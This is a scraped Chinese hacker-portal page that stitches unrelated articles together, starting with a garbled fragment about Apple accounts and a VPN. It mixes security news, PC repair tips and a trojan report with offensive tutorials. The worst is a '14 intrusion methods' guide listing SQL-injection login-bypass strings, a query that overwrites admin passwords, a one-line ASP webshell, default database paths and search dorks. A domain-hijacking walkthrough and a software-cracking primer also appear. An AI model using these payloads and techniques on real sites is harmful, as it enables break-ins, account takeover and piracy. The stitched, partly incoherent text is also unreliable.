苹果官网账户注册的账户密码,密钥kuai500 哪个苹果官网账户

苹果学院iOS 7频道,汇集了ios7插件推荐、ios7声音美化、ios7色彩壁纸、ios7字体美化大全、ios7完美越狱教程等ios7系统技术文章。
切换到精简模式
标签数目统计值
作者 /分类 /发布于
最近有不少学院的小伙伴们提问,即时通讯小软件Line无法连接了怎么办,……至于原因,官方未知,但是不能玩表情表示很忧伤。
难道Line也要被拍在墙角了么?幸亏还有后路,我挖到一个小软件可以复活Line
【设置】→【通用】→【VPN】→ 添加VPN设置,然后按下图操作:
协议类型IPSec——描述一栏任意填写——服务器一栏填IP地址,可在“我的账户”找到,
账户密码:在官网注册的账户密码,密钥
点击开启连接,成功后出现小图标,连不要太快哦
版权所有,转载请注明出处。
转载自 苹果学院()
如果喜欢这篇文章,欢迎以获得最新内容。
拿着青春去喂狗 -
℡莫名あ悲伤 -
-心不动则不痛丶 -
我若不毒 何以立足 -
我若不毒 何以立足 -小站会根据您的关注,为您发现更多,
看到喜欢的小站就马上关注吧!
下一站,你会遇见谁的梦想?
欢迎大家来到金盾安全网&打造网络安全全民化!我们的网址:&
金盾安全网简介
-以,,,,软件下载,,破解教程,,电子书下载,等软件教程下载站.
免费&&& 互助&& 平等&& 自由&&&
打造平民化 记住我们网址:
维护64位Win7旗舰版IE8的奇葩历程
今天在外娱乐,一个电话过来,说有台电脑要维修,说是IE浏览器没了,一般来说windows系统自带的IE浏览器能卸载掉的人,基本上都是玩得挺熟的,犯不着去修了。打开到手一看,仅仅是桌面上没有IE的图标,开始菜单里面有IE的快捷方式,直接找到目的文件夹,发送快捷方式到桌面。&
&(反)以为差不多了,到这里你以为结束了,那就我是二货了。&尼玛啊,打开浏览器一片白啊,真的是一片白啊,啥都没有啊!以为网络有问题,ping了一下,0%loss,网络木有问题,安装了firefox,打开一点问题都木有,因此判断IE崩溃了,内核挂掉了,重装IE吧。&以为问题解决了?NO,现在才是序幕。&到Microsoft官网,Internet Explorer主页,尼玛微软,只有IE9的下载有木有?点击下载,安装文件只有1.8MB,木有问题,安装,尼玛进度条到了五分之一彻底停了,整整一个小时啊!!!彻底没了耐心,下载太平洋软件的安装包,点击安装以后,尼玛不符合版本,不符合你妹啊,几个安装包都这样,娘的,一检查系统64位的,64位你妹啊!!! & &&不肯再试了,仔细阅读相关的博客,尼玛win7旗舰版啊,旗舰你妹啊,win7 sp1才能安装IE9啊。先不管了,升级到SP1肯定要下载很久很多东西,先装了IE8再说。网上查了一下,IE8没有WIN7的安装版本,why???&然后茅塞顿开,Win7自带IE8,要卸载肿么卸载捏,控制面板,程序,程序与应用,windows相关组件,把IE8前面的那个小钩钩去掉。然后等待着微软&可能&的&几分钟&,然后重启机器,然后再控制面板,程序,程序与应用,windows相关组件,勾上IE8的小钩钩,然后等待着微软&可能&的&几分钟&。接着长叹一声。打开,总算不是纯洁的了。&结束了?NO,what a fuck?尼玛一直跳出来脱机状态,连着网,他老是报脱机,就相当于带着套套但是注定要怀孕,这不合理!!!!&工具菜单,去掉脱机状态的钩钩,OK。&结束了?这次真的结束了。(来源:&)
win7 IE10无法启动解决
win7 IE10无法启动解决
IE10突然无法启动,解决办法如下:&
WIN + R,regedit,找到&
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main &
对左侧树Main节点右键&&权限。&
正常情况下应该会有SYSTEM、RESTRICTED、Administrators等用户组,少的话就不正常。&
再在当前页面点击高级,点击右下角的&启用继承&按钮即可。(来源:&)
北京打掉一以黑客编程和扫描获多家网站论坛账
法制网北京4月9日讯 记者黄洁 记者今天从北京市公安局了解到,北京警方经过三个月的缜密侦查,辗转四省八市,成功打掉一个以编程和使用代理扫描手段获取多家网站论坛账号并出售的犯罪团伙,3名犯罪嫌疑人被抓获归案。&& & 去年10月,北京警方接报案称,某大型门户网站论坛的用户登陆系统遭到大规模攻击,造成大量账号被盗,不仅给网站自身造成经济和信誉侵害,而且给广大网民也造成了巨大的现实经济和虚拟财产损失。接报案后,北京市公安局网安总队立即成立专案组,开展网上侦查。民警先后奔赴安徽和江苏两地查证,成功锁定两名嫌疑人,其中张某负责编写攻击程序,沈某具体实施恶意扫描,获取账号并出售后获利。同时,警方还发现,一个网络昵称为&狂人在线&的男子涉嫌销赃。&& & 今年1月,专案组兵分两路前往吉林、江苏两省,在当地网安部门的配合下,一举将两嫌疑人张某和沈某抓获归案。随即,警方又查明了&狂人在线&的真实身份,并于2月1日将其抓获。&& & 据三名犯罪嫌疑人供述,他们通过网络结识,然后松散结伙,使用攻击程序对多家网站实施恶意扫描,获取用户信息并非法出售,获利50余万元。&& & 目前,三人因涉嫌目非法侵入计算机信息系统罪被北京警方依法刑事拘留。&& & 北京网警提示说,在网络安全越来越重要的今天,每个网民都应具备一定的保护个人信息的意识,认真关注信息安全知识,提高自我防范能力。一旦发现自己的个人信息泄露,例如发现帐号被盗,则要及时修改帐号密码,最好对家用计算机重做系统;若发现帐号丢失,不要立即检查别的帐号情况,因为这个时候计算机上还存在木马。此外,当在线时发现被人顶号,则要先把虚拟社会中的重要物品加锁,在与盗号相互顶号的同时,去修改原始密码;若发现游戏帐号被盗,则要立即联系游戏网站客服电话,在客服的帮助下重新设定密码,找回游戏角色资料。(来源:)
韩官方称朝鲜黑客失手留下朝鲜内部IP地址
据韩联社4月11日报道,韩国民官军联合应对小组在对3月20日网络攻击事件进行调查后发现了使用的IP地址来自朝鲜,这为证明此前的攻击行为也同样是朝鲜所为提供了证据。  高丽大学信息保护研究生院教授金胜主11日在接受采访时表示,此次&3&20网络攻击&与过去被认为是朝鲜实施的网络攻击行为的手法与途径等都相似,而此次发现了朝鲜IP地址,所以可以确信过去和此次黑客事件均由朝鲜实施。
  其间韩国政府认为,2009年与2011年发生的两次DDoS攻击与2011年-2012年发生的农协、《中央日报》社计算机网络遭破坏事件等的元凶均为朝鲜。此次对3&20网络攻击调查的过程中,发现朝鲜失手留下的朝鲜内部IP地址,证明了韩国政府的判断是正确的。金胜主表示,因通信网问题朝鲜留下了IP地址,为政府调查带来线索,在需要进行双向通信的攻击中,IP地址被伪造的可能性很小。金胜主称,此次攻击中发现的攻击途径和恶意代码与过去DdoS攻击等使用的途径和代码很多是重复的,所以可以断定过去的黑客攻击也是朝鲜所为。
  高丽大学信息保护研究生院教授李景镐表示,3&20网络攻击中朝鲜留下了IP地址是因为通信网发生故障而出现的偶发性情况,朝鲜未预料到此点,所以没有另外进行伪装。
  此次韩国政府在发表调查结果中公开了朝鲜内部IP与部分攻击途径、恶意代码源软件等,就此有人担忧过多公开相关资料为今后调查朝鲜攻击带来阻碍。而韩国著名黑客组织&韩国匿名组织&(Anonymous Korea)在推特中对韩国政府发表的调查结果提出了质疑,部分人士还表示,没有黑客会使用自己的IP来进行攻击。
(来源: )
“电脑黑客”入侵长江水上GPS系统
为一点&烟酒费&,男子竟利用手中的软件和专业电脑,非法技术侵入并控制长江水上GPS综合应用系统,伪造信息为货轮提前申报过闸计划,致使部分船只&插队&过闸。昨日,伍家岗法院审理了我市首例非法控制计算机系统案,该男子面临3-7年的刑狱。  今年42岁的吴某原是大连某科技公司驻宜昌办事处的员工,主要负责船舶报闸GPS的安装与售后。2010年,公司交给吴某一个U盘,并告知其中的软件可以替下水船舶报闸。按照惯例,船舶要过闸,到了指定区域内需先申报,然后排队过闸。自从手中有了软件以后,凡是遇到GPS出故障又急需下水的船舶,吴某都会主动帮忙报闸。  2011年,该公司宜昌办事处解散,高层要求吴某去大连上班。但考虑到家在宜昌,吴某拒绝了邀请。利用公司留下的专业电脑、非法软件和配套的GPS卡,吴某继续在宜昌从事旧业。时间一长,吴某有门路报闸的传闻在船主间越传越广。在过闸高峰期,按照正常程序,船舶报闸后,一般要排队等两到三天才能顺利过闸,但若通过吴某提前报闸,到了船闸几乎畅行无阻,能节省不少时间。于是,很多人纷纷前来请他&帮忙&。一开始吴某并不愿意,但在&烟酒费&的诱惑下,他终于动摇了,200元、300元、500元&&去年3月至11月,吴某共为54艘货轮提前申报过闸计划,获取非法所得共计43110元。  去年11月,长江三峡通航管理局突然接到举报称&有船插队过闸&。随后,该局又发现GPS综合应用系统内出现重大疑点:一个月内竟有60多艘船舶在同一经纬度实行过闸申报及到锚确认,经纬度甚至精确到小数点后6位完全一致。通过摸底调查,该局将目标锁定在两艘多次在可疑地点申报过闸的货轮上,并将其列入了黑名单。去年11月8日,丝毫不知自己已犯法的吴某,亲自前往三峡通航管理局为涉事货轮说明情况,于次日在该局被公安机关抓获。该案将择日宣判。(来源:&)
微软4月星期二补丁日:RDP、IE获重要补丁
微软在4月的星期二补丁日共修补了13个漏洞,涉及远程桌面协议、IE等。
  工作站和服务器上的IE有两个关键补丁需要及时修复。补丁修复了对所有IE版本(包括Windows 8和Windows RT上的IE 10)造成影响的远程代码执行漏洞。
  该补丁缺陷在上个月召开的Pwn2Own大赛中被发现,但并不包含在IE累计更新中。
  某IT安全公司CTO说道,&我希望在一个月内见到它们,&他表示,微软在没进行测试之前,不需要快速发布更新,因为在比赛中暴露的弱点没有公开披露。
  远程桌面协议(RDP)也得到了重要修复,防止有人通过特殊网站远程执行代码。该补丁也与IE有关&&RDP客户端漏洞与ActiveX组件有关系。
  该公司的漏洞实验室主任说,如果企业用户没有需求,管理员们应该禁用ActiveX控件。
  在另一个公告中涉及到了一个活动目录缺陷,标记为重要,该漏洞可能导致服务器拒绝服务攻击。攻击者伪装请求轻量级目录访问协议服务。
  该风险或多或少被最小化了,因为攻击者要使用这个漏洞,必须拥有证书。该补丁对多个Windows Server 2012版本和之前的版本都有影响。
  SharePoint 2013也获得了修复。如果攻击者确定特定 SharePoint 列表的地址或位置,并且获得对维护该列表的 SharePoint 网站的访问权限,则此漏洞可能允许信息泄露。
  微软还修复了Windows Defender漏洞,攻击者利用该漏洞获得访问系统权限并允许特权提升。只有Windows 8和Windows RT系统需要该补丁,更早版本未受影响(来源:&)
黑客通过Java 0day漏洞偷盗比特币
比特币的匿名性质既是特性也是bug,如果比特币失窃,矿工们只能自认倒霉,要将失窃的财产追回来几乎是不可能的任务。当比特币的价值达到了令人难以置信的高度,它不可避免会成为某类的目标。
美国东部时间4月10日晚上,一位 Mt.Gox用户被人利用Java漏洞盗走了34比特币,虽然数量不多,但它的价值也相当于5千美元(根据目前的比特币美元兑换率)。他在比特币论坛上描述了整个过程,这种入侵方法非常典型:有人首先在聊天窗口发布了链接,声称 Mt.Gox将宣布交易litecoins(另一种受欢迎的数字货币),这个链接当然是恶意链接,它先载入Java applet,利用Java 0day漏洞进行跨站脚本注入攻击,它会下载恶意程序(AdobeUpdate-Setup1.84.exe)然后自动执行,整个攻击专为Mt.Gox(最大的比特币交易平台)用户定制,它记录了所有的密码,登录进比特币钱包,窃取比特币
电脑风扇声音大怎么办
电脑风扇声音大电脑风扇声音太大,散热效果很不好,这种问题相信很多网民都遇到过。如何有效解决这个问题却很少有人清楚。()机箱内风扇的声音越来越大,原因是风扇由于轴承缺油,轴承孔被磨损&&风扇的轴和轴承之间的间隙过大,而且风扇的轴向活动间隙也太大,风扇的扇叶可以前后移动几毫米。风扇在转动后作轴向运动,而且扇叶的转动平面也在晃动,不仅磨损越来越加剧,同时产生了很大的噪音。绝大多数的风扇故障都出于此因。虽然换一个新的风扇最省事,但一来不符合DIY精神,二来也不一定马上就能找到能够代换的型号。   &当然有这种故障的风扇并不是无法修复的,现在就介绍一个修理办法。材料很简单,只要一小片易拉罐铝皮和一点黄油(黄油要干净一点、没有杂质的那种)。  &&作为电脑散热最主要的工具风扇,也因为使用频率高,导致噪音越来越大。面对这种情况,你是否想过将噪音消灭呢?或许,你会说直接更换风扇不就行了,其实只要风扇没坏,完全没有必要用新的替换,只要对旧的风扇进行适当的维护,即可重新恢复正常。&&&电脑风扇声音大的原因&&润滑轴承  风扇转运最主要的部件就是轴承,时间长了缺乏润滑油,这样高速转动时就会产生噪声。因此,我们只需要在风扇轴承上滴几滴润滑油,如果没有使用缝纫机机代替也可以。但是注意千万不要使用食用油来替代,因为其颗粒比较大,容易对轴承产生伤害。&&&固定扇叶  震动噪音亦是风扇噪音的一个重要组成部分,因为叶片在轴承上的松动以及轴承磨损导致间隙变大等,因此只需要拆下分扇,把螺丝钮紧,这样牢牢固定之后,就不会再震动。&&打磨扇叶  另外使用质量较差的散热风扇,在制作这类风扇时由于工艺上的缺陷,扇叶的重心可能没有处在轴心上,形成&偏心&,使用时间一长,风扇的&偏心&现象会变的越来越严重,这不仅会产生噪音,严重的还可能损坏CPU。对此,可以将共拆下来,然后用细线吊在其中心位置,待其静止后看其向哪一方向下沉,把下沉的一端在砂轮上轻磨几下,再进行测试,一直待风扇能够处在水平位置之后再将其安装上去即可。&  相信经过上面的三招,风扇的噪音一般就可以清除了。&  建议:如果电脑工作环境较脏,电源盒应每年清理一次,就算风扇不响,考虑到电路板上那一堆灰尘,你也该清扫啊!&  机箱内风扇的声音越来越大,原因是风扇由于轴承缺油,轴承孔被磨损&&风扇的轴和轴承之间的间隙过大,而且风扇的轴向活动间隙也太大,风扇的扇叶可以前后移动几毫米。风扇在转动后作轴向运动,而且扇叶的转动平面也在晃动,不仅磨损越来越加剧,同时产生了很大的噪音。&&电脑风扇声音大怎么办  绝大多数的风扇故障都出于此因。虽然换一个新的风扇最省事,但一来不符合DIY精神,二来也不一定马上就能找到能够代换的型号。& 当然有这种故障的风扇并不是无法修复的,现在就介绍一个修理办法。材料很简单,只要一小片易拉罐铝皮和一点黄油(黄油要干净一点、没有杂质的那种)。  &首先将风扇上的灰尘清干净,避免在安装过程中再有灰尘进入轴承内;   &&将轴承封的不干胶撕下,取下轴上的卡销;  &将轴承内的残油用干净的绵纸或软布擦干净,然后将轴杆也擦干净;   &在轴承内加入一点黄油,原则是宁少勿多以免严重影响转速;   &.再将易拉罐的铝皮剪下照轴承卡销外径一样大剪一圆片,并在中间挖一个刚刚可以穿过轴杆的小孔,将它垫在轴承和卡销之间,减小轴承轴向移动和平行移动的距离。如间隙较大,就要垫上几个加厚才行,使轴承的前后移动距离在0.5mm以下;&将油封封好,加上一点黄油,最后将风扇装回显卡。  (来源:& )&&&  接上电源试试,你会发现声音小多了,而且这样一来至少可以用上2年。但是需要提醒的,尽管声音小了些,但因为手工精度有限,转速会稍稍下降一点&
黑客攻防:黑客是怎样实施域名劫持攻击
近期发现,,,等等著名站点都分分遭受到攻击,但攻击者所使用的技术并不是以往所使用的入侵WEB服务器,更改主页的惯用手法,攻击者使用的是一种域名劫持攻击技术,攻击者通过冒充原域名拥有者以E-MAIL方式修改网络解决方案公司的注册域名记录,将域名转让到另一团体,通过在修改后注册信息所指定的DNS服务器加进该域名记录,让原域名指向另一IP的服务器,通常那两台服务器都是攻击者预先入侵控制的服务器,并不归攻击者所拥有.&&  那攻击者到底是怎样实施该域名劫持攻击的呢?&&  1.获得要劫持的域名注册信息&&  攻击者会先访问网络解决方案公司,通过该公司主页面所提供的MAKE CHANGES功能,输入要查询的域名,获得该域名注册信息以为例,我们将获得以下信息:&&  Registrant:&&  Capital Cities/ABC,Inc (ABC10-DOM)&&  77 W 66th St.&&  New York, NY 10023&&  US&&  Domain Name: &&  Administrative Contact, Billing Contact:&&  King, Thomas C. (SC3123-ORG) abc.legal.internet.&&  ABC, Inc.&&  77 W 66th St.&&  New York, NY 10023&&  US&&  212-456-7012&&  Technical Contact, Zone Contact:&&  Domain Administrator (DA4894-ORG) dns-&&  Starwave Corporation&&  13810 SE Eastgate Way, ste. 400&&  Bellevue, WA 98005&&  US&&  206.664.4800&&  Fax- 206.664.4829&&  Record last updated on 11-Oct-2000.&&  Record expires on 23-May-2003.&&  Record created on 22-May-1996.&&  Database last updated on 20-Oct-:26 EDT.&&  Domain servers in listed order:&&   204.202.132.51&&  T.NS.VERIO.NET 192.67.14.16&  &  2.控制该管理域名的E-MAIL帐号&&  从上面获得的信息,攻击者可了解到的注册DNS服务器,管理域名的E-MAIL帐号,技术联系E-MAIL帐号等等注册资料,攻击者的重点就是先需要把该管理域名的E-MAIL帐号abc.legal.internet.控制,进行收发在网络解决方案公司networksolutions主页所修改域名注册记录后的确认E-MAIL,对该E-MAIL帐号的控制过程不排除攻击者对该E-MAIL帐号进行密码暴力猜测,对该帐号所在E-MAIL服务器进行入侵攻击.&&  3.修改该域名在网络解决方案公司的注册信息&&  到这个时候,攻击者会使用网络解决方案公司networksolutions的MAKE CHANGES功能修改该域名的注册信息,包括拥有者信息,DNS服务器信息,等等.&&  4.冒充拥有者使用管理域名的E-MAIL帐号收发网络解决方案公司确认函&&  攻击者会在该管理域名E-MAIL帐号的真正拥有者收到网络解决方案公司确认函之前,把该E-MAIL帐号的信件接收,使用该E-MAIL帐号回复网络解决方案公司进行确认,进行二次回复确认后,将收到网络解决方案公司发来的成功修改注册记录函,攻击者成功劫持域名&&  5.在新指定的DNS服务器加进该域名记录&&  在注册信息新指定DNS服务器里加进该域名的PTR记录,指向另一IP的服务器,通常那两台服务器都是攻击者预先入侵控制的服务器,并不归攻击者所拥有.&&  后补:我认为在这种情况下,一个关键的就是比较了解这个与名的注册信息,然后破信箱。呵呵!其实就是你域名劫持成功了,也会被最高权限拿回来!所以我劝那些想做的朋友还是学点别的吧!我贴的只是供给大家一点思路。(来源: )
超13万款游戏遭手机木马篡改 感染近2亿人次
水果忍者、植物大战僵尸、神庙逃亡&&在你的Android手机中,或许也安装了这些游戏,但要小心,安装的很可能是被手机木马篡改、植入恶意扣费、隐私窃取代码的版本。&  日前,360安全中心发布了业内首份《Android手机游戏安全状况报告》,报告指出:2012年全年及2013年1月、2月中,360手机卫士共截获到伪装、篡改Android游戏的手机木马及恶意软件(以下简称:游戏木马)、恶意广告插件共134927款,感染用户近2亿人次。&&2012年全年及月Android手机游戏安全状况&  其中,57%的游戏木马会在安装到手机中后向用户推送广告、后台下载软件消耗用户上网流量的行为,26%存在后台发送短信恶意扣费的行为,14%会收集、上传用户隐私,2%存在系统破坏及其它恶意行为。&&伪装、篡改Android手机游戏的木马主要恶意行为&  数据显示,第三方应用商店、论坛是当前游戏木马的主要传播途径,另有23.4%存在于水货手机的ROM刷机包中,而时下流行的二维码、短网址也正在成为游戏木马集中的温床,有16.5%的手机木马借此来伪装传播。&  同时,360安全中心还分析发现,大量Android手机游戏存在在非功能必要情况下调用过多权限的情况,如通过对1000款热门手机游戏进行抽样的权限分析后发现,其中59%存在调用过多权限,如在非必要情况下,读取用户通讯录、短信、位置信息的情况。&  除一系列统计数据外,本次报告还公布了经360安全中心统计的被伪装、篡改次数最多的游戏木马TOP20 &&植物大战僵尸&以累计发现有222个被伪装、篡改的版本居首,疯狂连连看、疯狂泡泡龙等也成为木马最常伪装、篡改的游戏。&&被伪装、篡改次数最多的游戏木马TOP20&  在伪装、篡改感染量最大的游戏木马TOP20中,&水果忍者&以单月1615815次的总感染量居首,植物大战僵尸、神庙逃亡2、捕鱼达人、超级玛丽等也以单款超过十万的感染量位列其中,篡改热门游戏的感染量惊人。(来源: )&
新型恶意木马病毒现身互联网
 国家计算机病毒应急处理中心通过对互联网的监测发现,一种新型恶意木马程序Trojan_Backdoor.d出现。&  这一新型木马程序具有以下特点:&  1、自身为可执行文件,在文件资源中捆绑图片资源以及动态链接库资源,图片资源为病毒,在传播中让用户认为自己不是病毒,混淆用户判断。&  2、该木马程序运行后会弹出一张图片文件,为游戏的账号密码和身份证资源信息,这些信息并无实际意义,如果用户不感兴趣会点击关闭,这时候真正的病毒已经在后台运行了。&  3、动态链接库文件释放出来后为了躲避杀毒软件上报,对自身进行了大量垃圾数据的填充,该动态链接库文件为远程控制软件,释放出来保存的后缀名称为JPG图片格式。&  针对已经感染该恶意木马程序的计算机用户,专家建议立即升级系统中的防病毒软件,进行全面杀毒。对未感染的用户建议打开系统中防病毒软件的&系统监控&功能,从注册表、系统进程、内存、网络等多方面对各种操作进行主动防御,这样可以第一时间监控未知病毒的入侵活动,达到全方位保护计算机系统安全的目的。(来源: )
金盾安全网已网络安全,黑客技术,黑客软件,黑客教程,网络安全,黑客帝国,破解教程,黑客动画,网站集反黑客与网络安全,系统网络,编程开发,为您提供从基础到高端的信息.
解密宝典——十招教你学会软件破解
解密宝典&&十招教你学会软件破解你也可以是
下面谈到了一些在学习解密过程中经常遇到的问题,本人根据自己的经验简单给大家谈一谈。这些问题对于初学者来说常常是很需要搞明白的,根据我自己的学习经历,如果你直接照着很多破解教程去学习的话,多半都会把自己搞得满头的雾水,因为有很多的概念要么自己不是很清楚,要么根本就不知道是怎么一回事,所以希望通过下面的讨论给大家一定的帮助:
  1. 断点
  所谓断点就是程序被中断的地方,这个词对于解密者来说是再熟悉不过了。那么什么又是中断呢?中断就是由于有特殊事件(中断事件)发生,计算机暂停当前的任务(即程序),转而去执行另外的任务(中断服务程序),然后再返回原先的任务继续执行。打个比方:你正在上班,突然有同学打电话告诉你他从外地坐火车过来,要你去火车站接他。然后你就向老板临时请假,赶往火车站去接同学,接着将他安顿好,随后你又返回公司继续上班,这就是一个中断过程。我们解密的过程就是等到程序去获取我们输入的注册码并准备和正确的注册码相比较的时候将它中断下来,然后我们通过分析程序,找到正确的注册码。所以我们需要为被解密的程序设置断点,在适当的时候切入程序内部,追踪到程序的注册码,从而达到crack的目的。
  2. 领空
  这是个非常重要的概念,但是也初学者是常常不明白的地方。我们在各种各样的破解文章里都能看到领空这个词,如果你搞不清楚到底程序的领空在哪里,那么你就不可能进入破解的大门。或许你也曾破解过某些软件,但那只是瞎猫碰到死老鼠而已(以前我就是这样的^_^,现在说起来都不好意思喔!)。所谓程序的领空,说白了就是程序自己的地方,也就是我们要破解的程序自己程序码所处的位置。也许你马上会问:我是在程序运行的时候设置的断点,为什么中断后不是在程序自己的空间呢?因为每个程序的编写都没有固定的模式,所以我们要在想要切入程序的时候中断程序,就必须不依赖具体的程序设置断点,也就是我们设置的断点应该是每个程序都会用到的东西。在DOS时代,基本上所有的程序都是工作在中断程序之上的,即几乎所有的DOS程序都会去调用各种中断来完成任务。
  但是到了WINDOWS时代,程序没有权力直接调用中断,WINDOWS系统提供了一个系统功能调用平台(API),就向DOS程序以中断程序为基础一样,WINDOWS程序以API为基础来实现和系统打交道,从而各种功能,所以WINDWOS下的软件破解其断点设置是以API函数为基础的,即当程序调用某个API函数时中断其正常运行,然后进行解密。例如在SOFTICE中设置下面的断点:bpx GetDlgItemText(获取对话框文本),当我们要破解的程序要读取输入的数据而调用GetDlgItemText时,立即被SOFTICE拦截到,从而被破解的程序停留在GetDlgItemText的程序区,而GetDlgItemText是处于WINDWOS自己管理的系统区域,如果我们擅自改掉这部分的程序代码,那就大祸临头了^_^!所以我们要从系统区域返回到被破解程序自己的地方(即程序的领空),才能对程序进行破解,至于怎样看程序的领空请看前面的SOFTICE图解。试想一下:对于每个程序都会调用的程序段,我们可能从那里找到什么有用的东西吗?(怎么样去加密是程序自己决定的,而不是调用系统功能实现的!)
  3. API
  即Application Programming Interface的简写,中文叫应用程序编程接口,是一个系统定义函数的大集合,它提供了访问操作系统特征的方法。 API包含了几百个应用程序调用的函数,这些函数执行所有必须的与操作系统相关的操作,如内存分配、向屏幕输出和创建窗口等,用户的程序通过调用API接口同WINDOWS打交道,无论什么样的应用程序,其底层最终都是通过调用各种API函数来实现各种功能的。通常API有两中基本形式:Win16和Win32。 Win16是原来的、API的16位版本,用于Windows 3.1;Win32是现在的、API的32位版本,用于Windows 95/98/NT/ME/2000。Win32包括了Win16,是Win16的超集,大多数函数的名字、用法都是相同的。
  16位的API函数和32位的API函数的区别在于最后的一个字母,例如我们设置这样的断点:bpx GetDlgItemText、bpx GetDlgItemTextA和bpx GetDlgItemTextW,其中 GetDlgItemText是16位API函数,GetDlgItemTextA和GetDlgItemTextW是32位API函数,而GetDlgItemTextA表示函数使用单字节,GetDlgItemTextW表示函数使用双字节。现在我们破解中常用到的是Win32单字节API函数,就是和GetDlgItemTextA类似的函数,其它的两种(Win16 API和Win32双字节API函数)则比较少见。 Win32 API函数包含在动态链接库(Dynamic Link Libraries,简称DLLs)中,即包含在kernel32.dll、user32.dll、gdi32.dll和comctl32.dll中,这就是为什么我们要在softice中用exp=C:\windows\system\kernel32.dll等命令行将这些动态链接库导入softice中的原因。因为不这样做的话,我们就无法拦截到系统Win32 API函数调用了。
  4. 关于程序中注册码的存在方式
  破解过程中我们都会去找程序中将输入的注册码和正确的注册码相比较的地方,然后通过对程序的跟踪、分析找到正确的注册码。但是正确的注册码通常在程序中以两种形态存在:显式的和隐式的,对于显式存在的注册码,我们可以直接在程序所处的内存中看到它,例如你可以直接在SOFTICE的数据窗口中看到类似""这样存在的注册码(这里是随意写的),对于注册码显式存在的软件破解起来比较容易;但是有些软件的程序中并不会直接将我们输入的注册码和正确的注册码进行比较,比如有可能将注册码换算成整数、或是将注册码拆开,然后将每一位注册码分开在不同的地方逐一进行比较,或者是将我们输入的注册码进行某种变换,再用某个特殊的程序进行验证等等。
  总之,应用程序会采取各种不同的复杂运算方式来回避直接的注册码比较,对于这类程序,我们通常要下功夫去仔细跟踪、分析每个程序功能,找到加密算法,然后才能破解它,当然这需要一定的8086汇编编程功底和很大的耐心与精力。(来源: ) &
黑客必会的14种入侵方法
想成为真正的,以下入侵方法你必须会。1.上传漏洞[不多讲] ps: 如果看到:选择你要上传的文件 [重新上传]或者出现&请登陆后使用&,80%就有漏洞了! 有时上传不一定会成功,这是因为cookies不一样.我们就要用wsockexpert取得cookies.再用domain上传.2.注入漏洞[不多讲] ps:对md5密码.有时我们不是哪么容易跑出来.如果是[sql].那么我们可以用以下命令: http://注入网址;update admin set password=&新md5密码& where password=&旧md5密码&-- [admin为表名.]3.旁注,也就是跨站. 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了4.暴库:把二级目录中间的/换成%5c ey:http://www./otherweb ... s.asp?bigclassname=职责范围&bigclasstype=1 如果你能看到:&e:\ahttc040901\otherweb\dz\database\ixuer_studio.asa&不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。 这样的就是数据库了。下载时用flashget换成.mdb格式的就行.5.&or&=&or&这是一个可以连接sql的语名句.可以直接进入后台。我收集了一下。类似的还有: &or&&=& " or "a"="a &) or (&a&=&a ") or ("a"="a or 1=1-- & or &a&=&a6.社会工程学。这个我们都知道吧。就是猜解。 ey:http://www./waishi/admin admin waishi7.写入asp格式数据库。就是一句话木马[〈%execute request("value")%〉 ],常用在留言本. ey:http://www.ahsdxy./ebook/db/ebook.asp[这个就是asp格式的数据库],再写入一句话木马8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. ey:http://www.ahsdxy./xiaoyoulu/index.asp 这个站用的是:杰出校友录,源码我下过了, 默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin9.默认数据库/webshell路径利用:这样的网站很多/利人别人的webshell. /databackup/dvbbs7.mdb /bbs/databackup/dvbbs7.mdb /bbs/data/dvbbs7.mdb /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe 工具:网站猎手 挖掘鸡 ey:/bbs/databackup/dvbbs7.mdb10.查看目录法:人一些网站可以断开目录,可以方问目录。 ey:/shop/admin/ /babyfox/admin/%23bb%23dedsed2s/ 这样我们可以找到数据库,下载不用我教吧11.工具溢出:.asp?newsid= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的webshell]12.搜索引擎利用: (1).inurllasher_list.asp 默认数据库atabase/flash.mdb 后台/manager/ (2).找网站的管理后台地址: intext:管理 intitle:管理 〈关键字很多,自已找〉 inurl:login (3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata filetype:mdbinurlatabase filetype:incconn inurlatafiletype:mdb 我主不做了。。自已做做吧。。13.cookie诈骗:把自己的id修改成管理员的,md5密码也修改成他的,用桂林老兵工具可以修改cookie。这个我就不多讲了14.利用常见的漏洞:如动网bbs ey:/bbs/index.asp 可以先用vbbs权限提升工具,使自已成为前台管理员。 then,运用:动网固顶贴工具,找个固顶贴,再取得cookies,这个要你自已做。我们可以用wsockexpert取得cookies/nc包 这个我就不做了,网上教程多的是,自已下个看看。 工具:dvbbs权限提升工具 动网固顶贴工具 15.还有一些老漏洞。如iis3,4的查看源码,5的delete cgi,php的一些老洞,我就不介绍了。(来源: )
如何预防电子邮件的病毒
如何预防电子邮件的病毒
防治邮件病毒有以下3种措施。
在收到邮件的时候,不管是认识的还是不认识的,附件一定先不要打开。
看见带有附件的邮件,可以把附件下载下来,然后用杀毒软件杀毒;也可以在重命名的时候在文件名的后面打上.txt,然后再杀毒。如果还是不放心,可以选择删除。
记住常用的一些注册网站的管理员邮箱,或者诏住邮箱后缀。在看见这些邮件的时候一点要仔细核对这些信息。(来源: )
无线攻防:破解WEP密钥过程全解(上)
WLAN技术出现之后,&安全&就成为始终伴随在&无线&这个词身边的影子,针对无线网络技术中涉及的安全认证加密协议的攻击与破解就层出不穷。现在,因特网上可能有数以百计,甚至以千计的文章介绍关于怎么攻击与破解WEP,但有多少人能够真正地成功攻破WEP的加密算法呢?下面笔者来给大家介绍一些关于WEP加密手段的知识,以及就是菜鸟只要按照步骤操作也可成功破解WEP密钥的方法。当然最终的目的还是为了让记者做好安全设置对破解更好的进行防范。本系列文章共两篇,在第一篇里主要介绍破解WEP的方法,第二篇里介绍如何设置WLAN的安全设置来进行更好的防范。()
  一、WEP:无线网络安全最初的保护者
